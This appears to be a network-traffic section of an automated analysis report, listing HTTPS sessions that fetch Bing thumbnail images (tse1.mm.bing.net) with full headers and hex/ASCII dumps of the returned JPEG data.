                                                                                                                                                                                                                  2024-12-18 20:06:08 UTC16384INData Raw: 76 1d c8 c3 1c 3b 16 78 88 cc de 66 fc 90 c0 c0 b3 c1 6a fe fe b5 48 1b b6 1b 96 f2 68 58 b2 88 ae c5 6a 2a c6 a2 9b 4f a7 0b d5 60 53 7b db 37 3b f7 ed d1 2d 0d 29 b2 a8 f7 cb 7f 81 5d 7d d3 8e 25 cd 45 19 e7 d1 03 48 f5 21 79 f0 32 bc 8e 57 91 16 fe 93 71 2b 42 48 22 f6 09 37 2d 5a ca ee a9 1e 03 29 e4 d3 a7 f8 e3 25 22 5a d1 d0 a2 32 a5 4d 59 e8 1d b5 72 41 dc 1d 8e aa 10 11 a3 87 2e 67 c1 cc aa 88 48 1b 0c e5 21 1e c0 c0 06 b7 6f 00 15 c5 88 25 87 36 39 f6 33 81 55 9f 3b f6 84 41 c3 2f cd f2 fa 8c 52 0d 88 22 01 29 28 fd bd 23 8a 5b bb 60 84 cd b1 ac 10 05 ee b2 95 25 ad 0a 98 a8 5b 43 c2 e4 d0 b2 6b cc d3 5a 04 ad ea 6c 89 5d c5 46 81 9e 2e 4a a3 af e9 63 88 c1 e7 d2 d5 13 32 fc 34 16 2e e3 4f d0 52 2e 6f d9 97 86 88 c8 9c 3e 2e 1e c2 50 69 3b eb 67
                                                                                                                                                                                                                  Data Ascii: v;xfjHhXj*O`S{7;-)]}%EH!y2Wq+BH"7-Z)%"Z2MYrA.gH!o%693U;A/R")(#[`%[CkZl]F.Jc24.OR.o>.Pi;g
                                                                                                                                                                                                                  2024-12-18 20:06:08 UTC16384INData Raw: a3 b0 91 18 83 e7 d0 67 25 94 6d 59 41 15 80 a4 3d 41 52 a6 c5 af 00 3d ef 0a fa 71 f9 95 7b 58 46 fa a0 8e da eb 6e 64 03 9c 1f 3a dd b6 57 69 57 da a0 e3 9d bb 10 ef 4a af 79 56 18 72 42 2b 6a 39 ee d3 2c 85 c2 56 ea 4e 6c 2b ae 6a 76 b1 f0 b5 54 ac 7d d1 61 b1 34 85 88 34 f7 01 82 7c ab 6b 11 ee 7c 07 b9 38 4c df 18 91 3e 58 08 a2 ce b8 e4 e7 22 39 f1 33 19 d5 aa 90 6e b8 26 d1 61 b3 17 27 25 2e 78 dc db fc 27 70 1e d1 a5 ca f7 29 9d 64 eb dd da 5a 25 48 1c 53 cd 85 8f e1 f2 2f 2b c1 04 d6 09 52 60 bc 6c 58 be aa e9 71 d5 3f 39 d0 5f ac 95 17 b7 60 3f 8d 54 c4 9b b8 3f b6 3b 53 a7 18 48 b0 b9 77 6f 6e 81 e5 5a 3d ad 5f 2d c4 e1 07 b6 0c e8 21 0f 09 94 03 a1 85 9d a2 c2 f0 b8 50 b0 5e e0 a4 93 2b f0 43 3a 23 34 37 58 ed 18 15 0a b6 98 4d 34 58 bd e4 42
                                                                                                                                                                                                                  Data Ascii: g%mYA=AR=q{XFnd:WiWJyVrB+j9,VNl+jvT}a44|k|8L>X"93n&a'%.x'p)dZ%HS/+R`lXq?9_`?T?;SHwonZ=_-!P^+C:#47XM4XB
                                                                                                                                                                                                                  2024-12-18 20:06:08 UTC16384INData Raw: 22 06 4d e4 1c cc c8 b4 e1 db a1 51 51 28 42 e9 8a 52 5f 21 7b 0e 49 24 b9 cd d3 a2 c8 86 2c 2e 91 09 5b d4 d7 de 8b 11 db 03 6b b1 b7 4b ca 64 cf a1 55 30 f5 f4 b0 29 99 e9 2e 30 1c d2 d5 7e 14 c2 85 aa c2 34 1f e8 e4 7e 3e e3 53 22 46 0d 71 e1 d5 7f 64 1d 27 67 15 aa a3 49 1f 6d 64 0a ad b5 d9 86 e2 da 9b 0f bb e3 4e a9 df 9b 29 e3 1c c6 20 9c ce 9e 68 34 1d 9d c0 33 1e 9b ab 0f b5 6f 8b ba c4 5c 54 85 4d fb cd 4d 76 b4 60 f7 38 57 7d 65 11 cf 10 fe c4 22 0d 8b de 48 98 20 fb 2f 82 92 41 6a 56 93 cb dd 5d b6 10 af e1 6c e1 3a 03 80 8a 81 87 df 6d 86 da 71 85 85 d0 95 34 c8 a4 92 a2 9b c1 35 49 da a0 c3 6c 2e 0e de 35 db 85 54 53 c0 38 4b 41 ac a6 b3 19 50 4c f9 49 44 da 5c 96 8d 2d bb 54 9c c5 05 cd 3f d7 d0 93 58 e7 c8 fa 90 20 b3 ce db 9b 9b d5 18 52
                                                                                                                                                                                                                  Data Ascii: "MQQ(BR_!{I$,.[kKdU0).0~4~>S"Fqd'gImdN) h43o\TMMv`8W}e"H /AjV]l:mq45Il.5TS8KAPLID\-T?X R


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  5192.168.2.649731150.171.28.10443
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:06:09 UTC346OUTGET /th?id=OADD2.10239340418563_16RSKIH5RQZW91ZBH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                  Host: tse1.mm.bing.net
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-12-18 20:06:09 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                  Content-Length: 324887
                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                  Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                  NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  X-MSEdge-Ref: Ref A: 19671E7DE1F04E4CB3BD64CBC0BCE967 Ref B: EWR30EDGE1105 Ref C: 2024-12-18T20:06:09Z
                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 20:06:09 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2024-12-18 20:06:09 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 32 3a 30 38 20 31 38 3a 34 33 3a 30 36 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 04 38 00 00 a0 03 00 03 00 00 00 01 07 80 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03
                                                                                                                                                                                                                  Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 24.1 (Windows)2023:02:08 18:43:068C
                                                                                                                                                                                                                  2024-12-18 20:06:09 UTC16384INData Raw: ea e3 ef 8b 3c 8f 5d fd e5 87 9f 05 73 1a b6 99 f6 59 19 96 3a f5 68 cd 23 86 a4 59 c9 c9 0d 5a b7 56 f2 ea d5 d5 bb b7 dd 8e 9f 6b 6c eb f3 79 75 d8 aa c4 e3 f6 62 42 25 5f f9 67 51 5f 42 cf 1e ea d9 b5 8f 7f de ab 53 59 40 d1 fc d1 d5 73 a6 1e cc e4 2c 6d 19 ee ab 77 fb 3b 62 6e a8 b6 34 17 5b 97 ee d5 ff 00 3f 7c 74 4a 4b 43 35 0b 18 fa 85 ae 63 f9 ab 98 d4 20 f2 24 dd 5d 9e a5 b9 e3 da b5 89 a9 59 fe f3 74 69 5d 14 ab 13 52 9e a6 03 6f 97 fd 5d 3a 3f 93 e6 9b f8 aa e5 c5 85 4a da 56 ef bb 27 ca b5 df ed 23 ca 71 3a 72 e6 33 16 dd 5d fe 58 e9 7c b5 8b 86 8e ba ad 16 d6 2f bb 26 ca 5d 4b 4b 8a 79 3e 5f e1 a8 fa c4 7b 9a 7b 29 1c 8c 92 67 f7 6b 1d 31 b7 1f 95 ab a7 93 4a 54 8f 72 fd ea c9 ba b3 95 6e bf d5 fc b5 51 c4 2b 11 2a 72 b9 4e 21 b6 a4 c2 cb f2
                                                                                                                                                                                                                  Data Ascii: <]sY:h#YZVklyubB%_gQ_BSY@s,mw;bn4[?|tJKC5c $]Yti]Ro]:?JV'#q:r3]X|/&]KKy>_{{)gk1JTrnQ+*rN!
                                                                                                                                                                                                                  2024-12-18 20:06:09 UTC16384INData Raw: b4 c9 fc cd cb f7 6a 6b 3d 31 a4 8f e6 f9 6b d0 63 d2 91 fe 56 8e ac 43 a2 41 e6 6d ad 3f b4 26 67 f5 3d 76 3c c2 fb 4b 95 7e 65 aa f1 db c8 bf 2f 97 f3 57 ab dd 68 d0 2f fc b3 ac 6b ad 11 11 f7 56 f4 73 06 df bc cc de 15 ae 87 15 6b 6f 2c 5f 7a b5 74 f8 9b cb dd fc 2d 5a ad 64 ab 26 da 49 ad 99 7f d5 d5 d4 c4 73 82 a5 6d 88 56 26 5f 96 93 ec 4c a9 f2 c9 b5 6a f4 31 7e ef fd 65 39 59 be ef 97 bd 6b 1f 68 8d d5 34 e3 a1 85 71 64 cb f3 2c 95 83 7d 6f 22 c9 ba bb 95 b5 69 ff 00 e5 85 43 7d a3 ac b0 7c b5 b5 1a e9 4b 53 9e b5 06 d6 87 9d cd b9 5e ac 42 9b a3 ad 8b ed 19 96 4a 81 ac a4 8b e6 af 45 57 8c fd d3 89 d3 68 cf 6b 76 5f 9a 99 e6 7f 0d 5b 92 e1 53 e5 6a 82 41 12 fe f2 a9 59 23 39 27 72 25 56 69 29 d2 48 cb 26 d6 a6 c8 55 a3 dd 1c 95 0f cd e5 f9 8d 57
                                                                                                                                                                                                                  Data Ascii: jk=1kcVCAm?&g=v<K~e/Wh/kVsko,_zt-Zd&IsmV&_Lj1~e9Ykh4qd,}o"iC}|KS^BJEWhkv_[SjAY#9'r%Vi)H&UW
                                                                                                                                                                                                                  2024-12-18 20:06:10 UTC16384INData Raw: e5 45 75 e3 5f 07 24 ee b1 da 46 f2 2f cb b1 eb 9a 75 39 99 f6 18 0c 65 0c 1d 3b 25 a9 cf 37 99 71 b1 57 cb 55 ab 7a 1d 83 5d 4f b7 ee ac 55 76 eb e2 0f 85 e0 8f 77 d8 20 56 ff 00 72 b5 21 f8 93 a5 45 a3 a5 d4 3a 4d ae ef ee 6c fe 1a e4 a9 09 cb a1 f4 58 7e 2d a7 4a d6 89 46 6b 75 f3 3e 5f 31 99 7e 5a bd a5 d8 79 b0 4d e6 41 f7 93 6d 64 7f c2 e5 d1 52 e9 f6 d8 41 b5 7f d8 ab 76 bf 1a 2c d2 3d d0 e9 b0 4b e6 a7 c8 9b 2b 96 58 39 5f de 47 b5 4f 8d 21 ca 6d 78 46 05 7b 59 a1 de fe 64 0f f2 6f ad 78 d1 56 3f 2e e2 49 25 dd f3 3f f7 ab 13 47 f8 a7 67 6f 6a f7 93 68 b0 7c a9 f3 a6 ca 67 fc 2e cf 0e 3c de 64 96 90 2c df c0 9e 5d 72 ac 2c 9b d1 1d d8 7e 3b 82 d2 48 ea b4 d9 56 d6 4f 2e e2 39 1a 39 7e e6 f7 ae b7 41 d4 6f ac a3 49 2d 64 da b1 7f 72 b8 3d 3f e3 27
                                                                                                                                                                                                                  Data Ascii: Eu_$F/u9e;%7qWUz]OUvw Vr!E:MlX~-JFku>_1~ZyMAmdRAv,=K+X9_GO!mxF{YdoxV?.I%?Ggojh|g.<d,]r,~;HVO.99~AoI-dr=?'
                                                                                                                                                                                                                  2024-12-18 20:06:10 UTC16384INData Raw: d3 c9 fd de da 87 a5 00 4d 48 af fd ea 66 ef 7a 64 8f 40 d1 3b 3d 37 ad 36 39 3f 77 4b bd 2a b9 46 24 89 fb bf 96 9a bb 7f 8a 95 a4 db f3 55 6b 89 59 a9 d8 57 24 90 d4 6c 6a ac 92 b2 d4 6d 3b 35 31 17 15 d7 f8 aa 16 9d 56 4a a7 35 c3 2d 51 be be d9 57 08 36 4c a5 62 fd d5 fa a5 55 92 ef 77 cd 58 3a 95 ee f9 2a ab 6a 5b 3e 5f 32 ba e3 43 b9 cb 3a c7 4e ba 82 af fb d4 92 6a 79 ff 00 80 d7 39 0d da bf cd 53 49 34 4d 1f cd 25 57 b0 33 f6 d7 35 3f b4 b7 49 f2 d4 b6 fa 86 e9 3e 6a c0 5d de 5e e5 fb b4 df 37 6f fc b4 aa f6 17 27 da 1d 0c d7 ab 50 c9 71 e6 c7 f2 d6 0f db 37 51 71 a9 ac 5f 2a c9 5b 47 0e 9b 26 55 6c 8b 97 93 2c 5f 7a a1 5b 98 a5 ac c9 35 05 9f 7a b5 57 86 5d 8f bb cc ae 98 d2 69 68 62 ea ab 9b b1 c8 af 26 da 66 a4 ea 95 9b 67 73 89 f7 54 da 84 9b
                                                                                                                                                                                                                  Data Ascii: MHfzd@;=769?wK*F$UkYW$ljm;51VJ5-QW6LbUwX:*j[>_2C:Njy9SI4M%W35?I>j]^7o'Pq7Qq_*[G&Ul,_z[5zW]ihb&fgsT
                                                                                                                                                                                                                  2024-12-18 20:06:10 UTC16384INData Raw: 9b e9 9e 67 ef 29 18 e2 a0 df fb cf 9a 90 17 a1 7a 9d 9e 2f 2e b3 bc cf ee d3 59 d9 a4 ff 00 66 95 80 be db 5a 9a b2 55 68 cd 2e 68 b0 16 bc ca 89 9f 75 47 ba 85 f9 a8 b1 24 f1 95 fe 2a 58 42 b4 95 0d 3a 1f 93 fe f9 dd 4e 3b 93 2d 8f 00 f1 d4 91 7f c2 55 ab 6d ff 00 9e cd 58 1a 6f cd f3 7f b1 5a 1e 28 0c de 26 d4 24 6f e2 b8 6a a7 a4 a6 e8 6b b1 7c 27 2b 97 bc 59 8d f7 41 b6 99 0c 0a bf 35 3e 31 12 c7 f3 53 bc bd df 32 bd 02 7b 12 db a6 cf 99 6a dd ba 6c a8 6d e4 55 8f 6b 54 f0 c8 ad 27 cd f7 68 32 8c ac 3a 40 cb 25 3a 37 f9 e9 5a 75 5f 96 9d f2 b7 cd 41 51 dd 8b 21 a1 53 75 31 8d 4d 0b aa d0 6c f5 d8 14 2b c7 b5 aa 21 16 d7 f9 6a 49 3f d9 a1 46 d8 ea 13 b0 25 62 39 9f 6c 75 6f 45 dc d5 0b 22 b4 75 67 4d 97 c8 b8 45 5f ef d2 93 2a 2e e7 6d a1 dc 4a b0 22
                                                                                                                                                                                                                  Data Ascii: g)z/.YfZUh.huG$*XB:N;-UmXoZ(&$ojk|'+YA5>1S2{jlmUkT'h2:@%:7Zu_AQ!Su1Ml+!jI?F%b9luoE"ugME_*.mJ"
                                                                                                                                                                                                                  2024-12-18 20:06:10 UTC16384INData Raw: c6 64 52 4e c9 1d 4b 66 9e 7f cd 54 26 dc ef 53 da bb 45 1d 27 b1 26 ba cb e5 47 b5 69 f0 cb e6 fc d5 92 d2 33 53 a3 96 55 93 6d 40 1a eb 27 ef 36 d0 cc eb 27 cd f7 6a 82 cf b6 86 b9 66 aa e5 4c ae 76 5c 92 45 fe 1a 6f 99 55 7c cd d4 79 94 d2 48 2f 72 f7 9b ba 8d fb 6a ac 6f 52 31 df f2 d4 72 d8 0b 51 cb 8f bd 4e 92 55 f2 eb 26 e1 9a 2a a3 71 a8 34 55 71 8d c9 94 99 bf e6 25 27 9a b5 c8 dc 6b fb 3e ed 4b 1e b6 d2 fd da b9 52 b1 11 93 3a 76 9f 6f cb fc 34 34 89 b3 75 73 17 17 f7 9e 5e e5 fb b5 89 79 e2 1b c4 7f 2e 4a d2 9d 0b 93 5a a2 89 e8 50 dc 44 df f2 d2 8f b4 45 e6 7c b2 7c b5 e6 9f db 57 9e 5b ed 92 85 d5 2f 9f f8 de b4 fa ad 8c 63 8a 3d 39 ae 3f e9 a2 54 5f 6c 55 ff 00 96 95 e6 b2 6b 17 8b f2 f9 94 43 ac df 34 9b 7c cf 96 b4 78 26 f6 33 fa e2 3d 1a
                                                                                                                                                                                                                  Data Ascii: dRNKfT&SE'&Gi3SUm@'6'jfLv\EoU|yH/rjoR1rQNU&*q4Uq%'k>KR:vo44us^y.JZPDE||W[/c=9?T_lUkC4|x&3=
                                                                                                                                                                                                                  2024-12-18 20:06:10 UTC16067INData Raw: a4 d4 3c 33 e2 a8 e3 f3 2c ee e7 55 6f fa 6f 51 1c 45 ce 49 53 4d e8 7d 11 37 d9 96 3f f5 f0 7f df 74 c8 e1 89 e3 f3 16 48 ff 00 ef ba f9 aa 3f 0d f8 fd ad 5f 77 da b7 2f fd 37 a6 d9 e9 9e 34 8b e5 fb 5d da ff 00 db 7a 7e d9 93 ec 6e 8f a7 7c 99 7c bf dd fc df f0 3a 96 de da 75 f9 99 2b e6 7f 2b c7 51 47 ba 1b bb ef ee fc 8f 50 fd ab e2 0a 49 ff 00 1f 7a ae d5 ff 00 6e 8f 6b 70 54 9a 3e a7 d3 6c 67 bc 9f cb 8e 0d f5 d1 e9 be 14 69 67 ff 00 4e 4d aa bf 73 65 7c 8f a7 f8 87 e2 35 a7 ef 2d f5 db e5 ff 00 80 56 b5 8f 8f fe 2c fd ef ed db b7 db fd f8 ea 7d b3 ee 3f 66 7d a1 a2 f8 72 c6 2f 9b ec 9e 6e df ef d7 45 63 65 12 c8 ad 1e 9a 8b fe e5 7c 4b a6 fc 68 f8 b3 07 ee db 52 fb bf df 4a d1 ff 00 86 8c f8 9f 65 f2 fd ae 36 65 ff 00 62 b9 ea 4d de e8 d2 30 67 4b
                                                                                                                                                                                                                  Data Ascii: <3,UooQEISM}7?tH?_w/74]z~n||:u++QGPIznkpT>lgigNMse|5-V,}?f}r/nEce|KhRJe6ebM0gK
                                                                                                                                                                                                                  2024-12-18 20:06:10 UTC16384INData Raw: af a2 9a e5 65 92 a9 46 c3 ae dd c8 f4 fb 38 ad 63 79 17 ef 33 ee af 01 fd a6 98 9f 10 5b ac 9f c2 ff 00 3a 57 d1 4c ca 91 fc d5 f3 6f ed 41 3f fc 54 c9 b6 b5 50 56 31 a3 ab 3a 0f d9 3e 78 ae 3c 5b 7d 0f 97 b5 7c 9f e0 af 72 91 d9 5f e5 af 03 fd 90 4f fc 54 7a 8c df f4 c6 bd f2 47 f2 e4 ff 00 57 59 f5 b0 54 56 90 db a9 36 41 fb cf e2 a7 d9 b2 34 1f f0 0a 86 f8 f9 f1 a5 2a 8d b0 7c bf dc a7 65 72 6e 55 be 8f 75 d7 fb 5e 4d 59 5d cd 26 ef e1 d8 ab 50 b4 8b f7 9b fb 95 34 72 af 97 49 c5 17 1e e5 c8 57 6f cb fc 55 67 49 75 5b e8 59 bf bf 59 6b e6 ef 59 ab 4e ce 45 fb 54 35 0e 2a c6 df 64 f4 05 9f 7c 29 b6 88 e3 dd f7 a9 34 f7 56 b5 4a 91 a5 db 5c d2 dc 06 42 9b a4 f9 7e ea d4 b3 1d df 76 9d 62 eb e4 3b 54 13 1d b4 8d 6e 2b 0d bf 76 a3 5f 9a 4d ad 4e 59 69 55
                                                                                                                                                                                                                  Data Ascii: eF8cy3[:WLoA?TPV1:>x<[}|r_OTzGWYTV6A4*|ernUu^MY]&P4rIWoUgIu[YYkYNET5*d|)4VJ\B~vb;Tn+v_MNYiU
                                                                                                                                                                                                                  2024-12-18 20:06:10 UTC16384INData Raw: 31 6c f8 63 c5 5e 02 be fe ce 87 54 58 27 59 a5 f9 76 6c aa 1a 3f c3 7d 4a 59 e5 86 e2 c1 e2 8d b6 fc ef 5f a0 3a f7 86 f4 79 e4 5b 55 b0 83 f7 49 b9 2b 2b c5 9a 16 83 a9 68 cf a6 b5 8c 76 f7 1b 17 f7 c9 5d 34 3c 43 52 f7 1c 47 f5 58 ae 87 e7 c6 ad e1 3d 42 ca fb ec 7e 46 ef 9f f8 3f bb 54 ef bc 3b 3d 84 89 1c c9 b6 46 fe fd 7e 80 68 ff 00 0b 3c 35 6b fb e9 2c 3e d5 37 93 f2 6f ac df 11 7c 22 f0 ae b3 75 6f 71 7d 69 b3 6f df 44 af 52 9f 88 18 5b f2 cd 19 3c 15 f6 47 c0 df 61 9d 37 ab 41 57 1b c3 b7 2b 1d bc 7f 23 49 2b ff 00 e3 b5 f7 56 a5 f0 67 c0 fa 8d 8f d9 e3 b1 fb 3f f7 29 fa 5f c0 cf 04 c5 a6 cd 1c d0 48 d3 2a 7c 8f 5b 4f c4 1c bd 2d 10 7d 41 f6 3e 26 5f 0d 2c 08 92 5c 47 23 7f b9 45 be 91 2b 4f b6 3b 4d 95 f6 f7 87 fe 13 e8 36 10 f9 cd 69 1c b1 b3
                                                                                                                                                                                                                  Data Ascii: 1lc^TX'Yvl?}JY_:y[UI++hv]4<CRGX=B~F?T;=F~h<5k,>7o|"uoq}ioDR[<Ga7AW+#I+Vg?)_H*|[O-}A>&_,\G#E+O;M6i


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  6192.168.2.649733150.171.28.10443
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:06:09 UTC375OUTGET /th?id=OADD2.10239340418564_10W6V5F7I280O8R44&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                  Host: tse1.mm.bing.net
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-12-18 20:06:09 UTC856INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                  Content-Length: 427192
                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                  Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                  NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  X-MSEdge-Ref: Ref A: A2842FE48CDE4E27BFDF091C56E1F7A0 Ref B: EWR311000108051 Ref C: 2024-12-18T20:06:09Z
                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 20:06:08 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2024-12-18 20:06:09 UTC15528INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 32 3a 30 38 20 31 38 3a 34 32 3a 31 39 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 07 80 00 00 a0 03 00 03 00 00 00 01 04 38 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03
                                                                                                                                                                                                                  Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 24.1 (Windows)2023:02:08 18:42:198C
                                                                                                                                                                                                                  2024-12-18 20:06:09 UTC16384INData Raw: 75 87 a8 69 1e 54 9b bc ba da 96 21 3d 0c a5 46 49 de c6 2b 15 58 d3 6f de fe e5 24 c8 df c5 56 66 b4 64 df bb e5 6f e0 a6 35 a4 f1 c7 fb c9 2b 68 d4 4f a8 a4 ad 1d 51 02 9f de 7f 7a a7 57 91 4e ed f4 c6 85 d3 ee fd ea 92 de da 56 ff 00 59 55 29 26 8c d2 6d 8e de ab f7 45 4c d3 a2 c7 ba 9b 35 b3 41 6f ff 00 2c ff 00 bd 55 a4 91 7c bf 96 a2 31 b8 ef 24 5e b1 76 69 de 45 a6 6a 53 b4 b0 6d fe ed 47 6b 22 34 6f fd ea a9 3b ed f9 5a 4f b9 50 a0 9b b9 ac a7 a1 12 a2 fd ef 33 e6 af 4c f8 67 a5 d8 de c0 8c df eb 36 57 9e d9 da 49 71 3a ac 35 d7 78 25 6f ac a4 ff 00 59 b5 7f d8 ae 6c 5d e5 0d 19 d1 87 dd 1e d1 a2 da 47 04 1e 5f 97 f2 ad 68 49 a7 c1 2c 1f 2d 63 f8 66 ed 9a d5 1a 69 3e f5 6d 2d c7 c9 b9 64 f9 7f b9 5f 27 53 9d 36 7b 8a 29 a3 9c d6 34 a9 fe 7f 2e 3a
                                                                                                                                                                                                                  Data Ascii: uiT!=FI+Xo$Vfdo5+hOQzWNVYU)&mEL5Ao,U|1$^viEjSmGk"4o;ZOP3Lg6WIq:5x%oYl]G_hI,-cfi>m-d_'S6{)4.:
                                                                                                                                                                                                                  2024-12-18 20:06:09 UTC16384INData Raw: 51 5b ff 00 ab 5a 3c df ef 7f 15 64 5d f4 25 df b6 98 d3 ff 00 0a d4 3b d7 cc a6 4c 76 c7 bb fb b4 46 3d 86 a4 d0 f9 ae 15 a9 cd 2a bc 9f 2f f7 2b 3b 7f f1 52 2b ed f9 bc ca a5 10 e6 35 21 7f de 56 9d 9b d6 0d bc fb ab 42 d5 ff 00 79 ba 94 e3 a0 e3 23 65 4a b7 cb 53 47 c7 fc b4 aa 71 ff 00 b5 1d 49 24 bf c3 5c ce 37 37 4e c8 d0 f3 55 a3 ff 00 76 a8 df 4e bf 76 aa b5 c3 37 fc b4 aa b7 97 7b 3e 6f 2e 9c 69 bb 93 29 74 21 be 95 52 4f 9a b3 e6 bf db f2 d4 3a b5 ee e8 f7 35 73 f7 d7 bb a4 fb fb 56 bb e8 d1 72 47 15 6a bc a6 c6 a1 7f b7 ee d6 44 da 96 ef f6 6b 1b 52 d4 5b f8 64 93 fe 01 58 f7 5a 9c f1 c8 fb 64 f9 5e bb e9 60 f5 47 15 4c 4a b1 eb 5b e9 d9 a8 57 6b 7f 1d 3a 3f 9b e6 af 98 3d f6 49 41 a1 53 7d 2b 0d bf ed 35 00 88 f1 51 48 95 3b 7c bf 7a 98 cb fc
                                                                                                                                                                                                                  Data Ascii: Q[Z<d]%;LvF=*/+;R+5!VBy#eJSGqI$\77NUvNv7{>o.i)t!RO:5sVrGjDkR[dXZd^`GLJ[Wk:?=IAS}+5QH;|z
